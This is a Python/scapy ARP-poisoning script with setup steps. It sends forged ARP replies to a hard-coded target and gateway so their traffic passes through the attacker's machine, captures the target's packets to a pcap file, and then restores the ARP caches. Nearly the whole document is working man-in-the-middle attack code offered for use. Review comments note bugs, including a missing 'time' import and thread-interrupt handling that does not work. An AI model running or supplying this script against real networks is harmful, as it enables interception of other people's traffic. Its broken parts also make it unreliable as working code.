ARP poisoning

Can ARP poison two hosts (named target and gateway). Before running this on a Linux PC, the following steps should be done.

1) Install scapy (pip install scapy)
2) Install tcpdump (apt-get install tcpdump)
3) Enable IPv4 network forwarding (echo 1 > /proc/sys/net/ipv4/ip_forward)

Then run the script with sudo.

from scapy.all import *
import os
import os
import sys
import threading
import signal

# Hard-coded for one specific network: the capture interface and the two
# hosts whose ARP caches are rewritten. Adjust before running.
interface = 'wlp3s0'
target_ip = '192.168.8.106'
gateway_ip = '192.168.8.1'
# How many packets the sniffer at the bottom of the script captures before
# it restores the real ARP mappings and stops.
packet_count = 1000

# Set interface
conf.iface = interface

# Turn off output
conf.verb = 0

print "Setting up %s" % interface

def get_mac(ip_address):
    """Resolve *ip_address* to a MAC address with a broadcast ARP request.

    Sends an Ethernet-broadcast ARP who-has for the address and returns the
    Ethernet source of the first reply, or None when nothing answers within
    the timeout/retry budget.
    """
    answered, _unanswered = srp(
        Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(pdst=ip_address),
        timeout=2,
        retry=10,
    )
    # Only the first answering host matters; any further replies are ignored.
    return next((reply[Ether].src for _sent, reply in answered), None)

# Resolve both hardware addresses up front; the forged replies below need
# the real MACs as their Ethernet destinations, and the restore step needs
# them to re-advertise the true mappings.
gateway_mac = get_mac(gateway_ip)

if gateway_mac is None:
    print 'Failed to get mac'
    # NOTE(review): exits with status 0 on failure, so a caller cannot
    # distinguish this from a normal run.
    sys.exit(0)
else:
    print "Gateway %s is at %s" % (gateway_ip, gateway_mac)

target_mac = get_mac(target_ip)

if target_mac is None:
    print 'Failed to get mac'
    sys.exit(0)
else:
    print " Target %s is at %s" % (target_ip, target_mac)

def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
    """Re-advertise the real IP->MAC mappings to both hosts, then stop the script.

    Sends five broadcast ARP replies in each direction so the target learns
    the gateway's true MAC again and the gateway learns the target's, then
    raises SIGINT in this process so the main thread unwinds.
    """
    print 'Restoring target...'
    # op=2 is an ARP reply; hwdst is broadcast so every host on the segment,
    # not just the two named ones, sees the corrected mapping.
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst='ff:ff:ff:ff:ff:ff', hwsrc=gateway_mac),count=5)
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst='ff:ff:ff:ff:ff:ff', hwsrc=target_mac), count=5)

    # Signals the main thread kill
    # NOTE(review): the main thread calls this from inside a try block that
    # catches KeyboardInterrupt and then calls restore_target again, so the
    # restore appears to run twice and the second SIGINT is raised outside
    # any handler.
    os.kill(os.getpid(),signal.SIGINT)


def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
    """Repeatedly send forged ARP replies to the target and to the gateway.

    Each reply claims the other host's IP address; hwsrc is not set, so (as
    the inline comment below notes) the source MAC ends up being this
    machine's, and both hosts send each other's traffic through this host.
    Loops until KeyboardInterrupt, then restores the real mappings.
    """
    poison_target = ARP()
    # op=2 is an ARP reply sent without any matching request -- the
    # unsolicited "is-at" that arpwatch, Dynamic ARP Inspection and static
    # ARP entries are designed to catch or ignore.
    poison_target.op = 2
    poison_target.psrc = gateway_ip # setting up source ip of the packet.
    poison_target.pdst = target_ip # setting up destination ip of the packet.
    poison_target.hwdst = target_mac # setting up destination mac of the packet.
    # As a result source mac address will be the mac address of the attacking computer.

    # Mirror image of the packet above: tells the gateway that target_ip is
    # reachable at this host's MAC.
    poison_gateway = ARP()
    poison_gateway.op = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst = gateway_mac

    print 'Begining the ARP pison. CTRL-C to stop'

    while True:
        try:
            send(poison_target)
            send(poison_gateway)

            # NOTE(review): `time` is never imported in this file, so this
            # line raises NameError on its first execution and the thread
            # exits after one pair of replies.
            time.sleep(100)

        except KeyboardInterrupt:
            # NOTE(review): KeyboardInterrupt is only delivered to the main
            # thread, so this handler does not run when poison_target is
            # started in the worker thread below.
            restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
            print 'ARP poisoning attack finished'
            return

# Start poisoning thread
# Start poisoning thread
# NOTE(review): the thread is neither marked daemon nor joined, so sys.exit
# in the main thread does not stop it if it is still looping.
poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()

try:
    print "Starting sniffer for %d packets" % packet_count
    # BPF filter: only traffic to or from the target is captured.
    bpf_filter = "ip host %s" % target_ip
    packets = sniff(count=packet_count,filter= bpf_filter, iface=interface)
    # Written relative to the current working directory.
    wrpcap('arper.pcap', packets)

    # Restore the network
    # NOTE(review): restore_target() raises SIGINT in this process, which
    # surfaces here as KeyboardInterrupt and falls into the handler below,
    # so the restore appears to run a second time.
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)

except KeyboardInterrupt:
    # Restore network
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
    sys.exit(0)



